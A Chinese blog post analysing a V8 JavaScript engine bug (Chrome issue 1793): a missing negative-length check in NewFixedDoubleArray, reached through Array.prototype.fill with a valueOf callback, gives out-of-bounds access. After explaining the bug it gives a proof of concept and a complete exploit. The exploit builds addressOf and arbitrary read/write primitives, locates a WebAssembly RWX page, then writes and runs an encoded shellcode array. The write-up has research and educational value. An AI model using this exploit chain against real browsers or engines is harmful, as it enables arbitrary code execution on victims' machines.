Chrome issue-1793分析

已于 2023-07-12 12:06:42 修改
阅读量196 收藏
点赞数 2
文章标签: javascript 安全
于 2023-07-12 12:00:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/131676836
版权

环境配置

git reset --hard dd68954
gclient sync
tools/dev/v8gen.py x64.release
ninja -C out.gn/x64.release

漏洞分析

在v8/src/heap/factory.cc文件的NewFixedDoubleArray函数中可以发现开发人员对length进行了长度的检查,即DCHECK_LE(0, length)。但由于DCHECK只在debug中起作用,而在release中并不起作用,则该检查对正式版本并没有什么作用。如果length为负数,则会绕过if (length > FixedDoubleArray::kMaxLength)的检查,而由于int size = FixedDoubleArray::SizeFor(length)会使用length来计算出size,如果我们合理控制length,则可以让size计算出来为正数。

// v8/src/heap/factory.cc
Handle<FixedArrayBase> Factory::NewFixedDoubleArray(int length,PretenureFlag pretenure) {
  DCHECK_LE(0, length); // ***here***
  if (length == 0) return empty_fixed_array();
  //负数绕过检查
  if (length > FixedDoubleArray::kMaxLength) { 
    isolate()->heap()->FatalProcessOutOfMemory("invalid array length");
  }
  //计算出一个正数
  int size = FixedDoubleArray::SizeFor(length); // ***here***
  Map map = *fixed_double_array_map();
  //申请elements空间
  HeapObject result =
    AllocateRawWithImmortalMap(size, pretenure, map, kDoubleAligned);
  Handle<FixedDoubleArray> array(FixedDoubleArray::cast(result), isolate());
  array->set_length(length);
  return array;
}

// Garbage collection support.
inline static int SizeFor(int length) {
  return kHeaderSize + length * kDoubleSize;
}

在对length进行判断时,只判断了length的上限不大于maxlength,而并没有判断其下限,又因为传入的length参数类型是int,所以传入一个负数依然可以绕过检查,接着在下边的sizefor函数中,又会计算出一个正数的size。看一下sizefor的实现

// Garbage collection support.
inline static int SizeFor(int length) {
  return kHeaderSize + length * kDoubleSize;
}

如果传入的length为0x80000000,则经过计算返回的size为0x10+0x80000000*8=0x10。再调用AllocateRawWithImmortalMap则只会申请0x10的空间。

漏洞触发

在v8/src/builtins/builtins-array.cc文件中的ArrayPrototypeFill函数可以调用NewFixedDoubleArray函数。

BUILTIN(ArrayPrototypeFill) {
  HandleScope scope(isolate);
	
  if (isolate->debug_execution_mode() == DebugInfo::kSideEffects) {
    if (!isolate->debug()->PerformSideEffectCheckForObject(args.receiver())) {
      return ReadOnlyRoots(isolate).exception();
    }
  }

  // 1. Let O be ? ToObject(this value).
  //获取对象,返回值为receiver
  Handle<JSReceiver> receiver;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, receiver, Object::ToObject(isolate, args.receiver()));

  // 2. Let len be ? ToLength(? Get(O, "length")).
  //获取对象长度,返回值length
  double length;
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, length, GetLengthProperty(isolate, receiver));

  // 3. Let relativeStart be ? ToInteger(start).
  // 4. If relativeStart < 0, let k be max((len + relativeStart), 0);
  //    else let k be min(relativeStart, len).
  //获取开始长度start
  Handle<Object> start = args.atOrUndefined(isolate, 2);

  double start_index;
  //获取Start处的值start_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, start_index, GetRelativeIndex(isolate, length, start, 0));

  // 5. If end is undefined, let relativeEnd be len;
  //    else let relativeEnd be ? ToInteger(end).
  // 6. If relativeEnd < 0, let final be max((len + relativeEnd), 0);
  //    else let final be min(relativeEnd, len).
  Handle<Object> end = args.atOrUndefined(isolate, 3);

  double end_index;
  //获取end处的值end_index
  MAYBE_ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, end_index, GetRelativeIndex(isolate, length, end, length));

  if (start_index >= end_index) return *receiver;

  // Ensure indexes are within array bounds
  DCHECK_LE(0, start_index);
  DCHECK_LE(start_index, end_index);
  DCHECK_LE(end_index, length);

  Handle<Object> value = args.atOrUndefined(isolate, 1);
	//调用TryFastArrayFill,start_index和end_index都是double类型
  if (TryFastArrayFill(isolate, &args, receiver, value, start_index,
                       end_index)) {
    return *receiver;
  }
  return GenericArrayFill(isolate, receiver, value, start_index, end_index);
}

该函数首先获取args.receiver()对象,返回值为receiver对象。再获取receiver对象的长度,返回值为length。接着分别获取start和end,这里调用了GetRelativeIndex方法,该方法会触发用户自定义的JS函数,如果自定义函数可以修改其length,则可以造成oob。 

看一下GetRelativeIndex方法实现

V8_WARN_UNUSED_RESULT Maybe<double> GetRelativeIndex(Isolate* isolate,
                                                     double length,
                                                     Handle<Object> index,
                                                     double init_if_undefined) {
  double relative_index = init_if_undefined;
  if (!index->IsUndefined()) {
    Handle<Object> relative_index_obj;
    //ToInteger函数会触发自定义函数
    ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, relative_index_obj,
                                     Object::ToInteger(isolate, index),
                                     Nothing<double>());
    relative_index = relative_index_obj->Number();
  }

  if (relative_index < 0) {
    return Just(std::max(length + relative_index, 0.0));
  }

  return Just(std::min(relative_index, length));
}

可以发现其中调用了ToInteger方法,该方法可以调用自定义函数。

接着执行最后的TryFastArrayFill。

V8_WARN_UNUSED_RESULT bool TryFastArrayFill(
    Isolate* isolate, BuiltinArguments* args, Handle<JSReceiver> receiver,
    Handle<Object> value, double start_index, double end_index) {
  // If indices are too large, use generic path since they are stored as
  // properties, not in the element backing store.
  if (end_index > kMaxUInt32) return false;
  if (!receiver->IsJSObject()) return false;

  if (!EnsureJSArrayWithWritableFastElements(isolate, receiver, args, 1, 1)) {
    return false;
  }

  Handle<JSArray> array = Handle<JSArray>::cast(receiver);

  // If no argument was provided, we fill the array with 'undefined'.
  // EnsureJSArrayWith... does not handle that case so we do it here.
  // TODO(szuend): Pass target elements kind to EnsureJSArrayWith... when
  //               it gets refactored.
  if (args->length() == 1 && array->GetElementsKind() != PACKED_ELEMENTS) {
    // Use a short-lived HandleScope to avoid creating several copies of the
    // elements handle which would cause issues when left-trimming later-on.
    HandleScope scope(isolate);
    JSObject::TransitionElementsKind(array, PACKED_ELEMENTS);
  }

  DCHECK_LE(start_index, kMaxUInt32);
  DCHECK_LE(end_index, kMaxUInt32);

  uint32_t start, end;
  CHECK(DoubleToUint32IfEqualToSelf(start_index, &start));
  CHECK(DoubleToUint32IfEqualToSelf(end_index, &end));

  ElementsAccessor* accessor = array->GetElementsAccessor();
  accessor->Fill(array, value, start, end);							// 调用具体的Fill函数来进行填充
  return true;
}

在最后执行Fill函数。v8/src/elements.cc

static Object FillImpl(Handle<JSObject> receiver, Handle<Object> obj_value, uint32_t start, uint32_t end) {
  // Ensure indexes are within array bounds
  DCHECK_LE(0, start);
  DCHECK_LE(start, end);

  // Make sure COW arrays are copied.
  if (IsSmiOrObjectElementsKind(Subclass::kind())) {
    JSObject::EnsureWritableFastElements(receiver);
  }

  // Make sure we have enough space.
  uint32_t capacity =
      Subclass::GetCapacityImpl(*receiver, receiver->elements());
  if (end > capacity) {
    Subclass::GrowCapacityAndConvertImpl(receiver, end); // ***here***
    CHECK_EQ(Subclass::kind(), receiver->GetElementsKind());
  }

首先判断start和end的关系,然后获取当前对象数组的容量capacity,判断end和capacity,如果end大,则需要调用GrowCapacityAndConvertImpl增加数组容量。该函数最终会调用到 ConvertElementsWithCapacity

// /home/ruan/v8_build/v8_src/v8/src/elements.cc 
static Handle<FixedArrayBase> ConvertElementsWithCapacity(
      Handle<JSObject> object, Handle<FixedArrayBase> old_elements,
      ElementsKind from_kind, uint32_t capacity, uint32_t src_index,
      uint32_t dst_index, int copy_size) {
    Isolate* isolate = object->GetIsolate();
    Handle<FixedArrayBase> new_elements;
    if (IsDoubleElementsKind(kind())) {
      new_elements = isolate->factory()->NewFixedDoubleArray(capacity);					// (11)
    } else {
      new_elements = isolate->factory()->NewUninitializedFixedArray(capacity);
    }

    int packed_size = kPackedSizeNotKnown;
    if (IsFastPackedElementsKind(from_kind) && object->IsJSArray()) {
      packed_size = Smi::ToInt(JSArray::cast(*object)->length());
    }

    Subclass::CopyElementsImpl(isolate, *old_elements, src_index, *new_elements,
                               from_kind, dst_index, packed_size, copy_size);

    return new_elements;
  }

可以看到这里会调用NewFixedDoubleArray触发漏洞。

漏洞利用

首先给出poc

// test on d8 release version
array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;
}});
let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8); 
%DebugPrint(array);
%DebugPrint(a);
%DebugPrint(ab);
%SystemBreak();

 打印array的内存,找到其elements地址

打印array的elements的内存

 

发现本该都是1.1的值,但是前边array-->elements的部分区域被a和ab的内存覆盖了。那么我们就可以通过修改array--->elements来修改a和ab的内存区域,从而达到任意地址读写的效果。

exp

var buf = new ArrayBuffer(16);
var float64 = new Float64Array(buf);
var bigUint64 = new BigUint64Array(buf);
var Uint32 = new Int32Array(buf);

function f2i(f)
{
    float64[0] = f;
    return bigUint64[0];
}

function i2f(i)
{
    bigUint64[0] = i;
    return float64[0];
}


function hex(i){
    return '0x' + i.toString(16).padStart(16, '0');
}

array = [];
array.length = 0xffffffff;
arr = array.fill(1.1, 0x80000000 - 1, {valueOf() {
  array.length = 0x100;
  array.fill(1.1);
  return 0x80000000;

}});
let a = new Array(0x12345678,0); 
let ab = new ArrayBuffer(8);


let idx = arr.indexOf(i2f(0x1234567800000000n)); 
function addressOf(obj)
{
    a[0] = obj;         
    return f2i(arr[idx]);
}

let backstore_ptr_idx = arr.indexOf(i2f(8n)) + 1; 
function arb_read(addr)
{
    arr[backstore_ptr_idx] = i2f(addr);
    let dv = new DataView(ab); 
    return f2i(dv.getFloat64(0,true)) 
}

function arb_write(addr,data)
{
    arr[backstore_ptr_idx] = i2f(addr);
    let ua = new Uint8Array(ab); 
    ua.set(data);
}

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
var f = wasmInstance.exports.main;
var wasm_instance_addr = addressOf(wasmInstance) - 1n;
console.log("[+]leak wasm instance addr: " + hex(wasm_instance_addr));
var rwx_page_addr = arb_read(wasm_instance_addr + 0x108n);
console.log("[+]leak rwx_page_addr: " + hex(rwx_page_addr));

const sc = [72, 49, 201, 72, 129, 233, 247, 255, 255, 255, 72, 141, 5, 239, 255, 255, 255, 72, 187, 124, 199, 145, 218, 201, 186, 175, 93, 72, 49, 88, 39, 72, 45, 248, 255, 255, 255, 226, 244, 22, 252, 201, 67, 129, 1, 128, 63, 21, 169, 190, 169, 161, 186, 252, 21, 245, 32, 249, 247, 170, 186, 175, 21, 245, 33, 195, 50, 211, 186, 175, 93, 25, 191, 225, 181, 187, 206, 143, 25, 53, 148, 193, 150, 136, 227, 146, 103, 76, 233, 161, 225, 177, 217, 206, 49, 31, 199, 199, 141, 129, 51, 73, 82, 121, 199, 145, 218, 201, 186, 175, 93];
for(let i = 0; i < sc.length / 8; i++ ){
    arb_write(rwx_page_addr + BigInt(i) * 8n ,sc.slice(i * 8,(i + 1) * 8));
}

f();

 成功弹出计算器。

参考

Chrome issue-1793分析-安全客 - 安全资讯平台 (anquanke.com)

Chrome issue 1793 分析 | ruan (ruan777.github.io)

KingKi1L3r
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全】简要分析Chrome-V8-Issue-762874
HBohan的博客
11-29 227
这是A guided tour through Chrome’s javascript compiler上的第二个漏洞,下面是对应的commit 环境搭建 用v8-action env: PATCH_FLAG: true COMMIT: d2da19c78005c75e0f658be23c28b473dd76b93b #这里 DEPOT_UPLOAD: false SRC_UPLOAD: true BINARY_UPLOAD: false 编译 cd v8 tools/dev/v8
issue-translator-extension:Chrome扩展程序-为非英语语言的程序员翻译GitHub上的问题,提取请求和评论
01-30
issue-translator-extension】是一款专为非英语背景的程序员设计的Chrome浏览器扩展程序,它旨在帮助用户翻译GitHub上的问题(issues)、拉取请求(pull requests)以及相关的评论内容。这款扩展利用了强大的翻译...
Chrome dev tool issue
zhuchuji的博客
06-11 388
Chrome dev tool issue
Chrome漏洞分析与利用(三)——Issue-1062091漏洞分析
Anansi的博客
04-12 1134
漏洞环境 漏洞说明 Issue-1062091为chrom中存在的一个UAF漏洞,此漏洞存在于chromium的Mojo框架中,利用此漏洞可以导致chrome与基于chromium的浏览器沙箱逃逸。 这个漏洞是在Chrome 81.0.4041.0的提交中引入的。在几周后,这个提交中的漏洞恰好移动到了实验版本命令行标志的后面。但是,这个更改位于Chrome 82.0.4065.0版本中,因此该漏洞在Chrome稳定版本81的所有桌面平台上都是可以利用的。 环境配置 一开始打算像调试v8漏洞那样尝试用fetc
新版本chrome浏览器带来的跨域请求cookie丢失问题
qq_16059847的博客
09-27 5894
今天线上业务的跨域接口请求莫名的出现问题,经深入排查,发现新版本的chrome浏览器(80版本之后)对cookie的校验更加严格,SameSite属性默认值由None变为Lax,因此可能会对线上业务带来问题特此与大家同步一下今天的发现,存在跨域接口调用业务的小伙伴可能需要关注。 chrome升级到80版本之后(准确的说是78版本之后,灰度测试,如上图,即也可能存在同一版本不同人的浏览器表现不同),cookie的SameSite属性默认值由None变为Lax,该问题的讨论可参考:https://githu
简要分析Chrome-V8-Issue-762874
xxwn202302的博客
07-26 51
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Chrome漏洞分析与利用(十三)——issue-1182647(CVE 2021-21195)漏洞分析
Anansi的博客
11-25 661
由于调用了gc函数,所以在使用d8执行时需要加上–expose-gc 参数,执行后。
aria-issue-autofix:Chrome 扩展,自动修复咏叹调问题
06-13
"aria-issue-autofix:Chrome 扩展,自动修复咏叹调问题" 这个标题提到了一个名为 "aria-issue-autofix" 的 Chrome 浏览器扩展,它的主要功能是自动修复与咏叹调(Aria)相关的问题。Aria,全称 Accessible Rich ...
wps-issue-157-repro
02-22
在深入研究这个问题时,首先需要按照README中的指示设置和运行项目,然后使用开发者工具(如Chrome DevTools)来调试JavaScript代码,查看错误日志,分析性能瓶颈。如果问题涉及到第三方库,可能需要查阅其文档或在...
【技术分享】Chrome Issue 776677(CVE-2017-15399)asm.js UAF漏洞分析 .pdf
09-05
Chrome Issue 776677(CVE-2017-15399):asm.js Use-After-Free 漏洞分析】 在Web安全领域,Chrome Issue 776677(CVE-2017-15399)是一个重要的安全事件,它涉及到asm.js(Assembly JavaScript)中的Use-After-...
chrome issue 1051017 v8 逃逸 .pdf
09-05
【标题】:Chrome Issue 1051017:V8引擎中的逃逸漏洞详解 【描述】:本文将深入探讨Chrome浏览器中出现的Issue 1051017,这是一个与V8 JavaScript引擎相关的安全问题,涉及逃逸漏洞。此问题在2020年2月被公开,...
JavaScript青少年简明教程:函数及其相关知识(下)
cnds123的专栏
07-26 650
JavaScript青少年简明教程:函数及其相关知识(下)
VUE3自定义指令防止重复点击多次提交
最新发布
MadSnail00的博客
07-30 79
vue3连续点击按钮重复提交,vue3自定义指令防止重复提交
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 424
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 1305
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
已解决:vue-office/excel 多个sheet点击切换,滚动条高度不重置,表格视图位置不正确
weixin_42289080的博客
07-26 266
解决 @vue-office/excel 多个sheet切换,内容以及滚动条展示不正确的问题
vue el-select的下拉树形结构 带检索功能
Jokerxiuka的博客
07-26 220
【代码】vue el-select的下拉树形结构。
chrome --remote-debugging-port=9222
09-18
chrome --remote-debugging-port=9222 是一个 Chrome 浏览器的命令行参数。它的作用是设置 Chrome 浏览器开启远程调试的端口号为9222。 远程调试是一种运行 Chrome 浏览器时,通过与开发工具(如 Chrome DevTools)进行通信和交互的方式。通过指定 --remote-debugging-port 参数,我们可以在运行 Chrome 的同时,通过特定的端口号与其建立连接并进行调试。 为了实现远程调试,我们需要首先运行 Chrome 浏览器,并在命令行中添加参数 --remote-debugging-port=9222。这将开启一个调试工具的端口号为9222的本地服务器。接下来,我们可以通过其他工具(如 Chrome DevTools 或第三方开发工具)连接到这个端口并进行调试操作。 远程调试在开发过程中非常有用。它可以让开发者在远程设备上调试 Chrome 浏览器的页面,即使这个设备上没有直接运行 Chrome 浏览器。比如,我们可以通过远程调试在手机上对一个在桌面浏览器上运行的网页进行调试。 总之,通过设置 chrome --remote-debugging-port=9222 命令行参数,我们可以在运行 Chrome 的同时开启远程调试端口,并通过其他工具进行远程调试操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值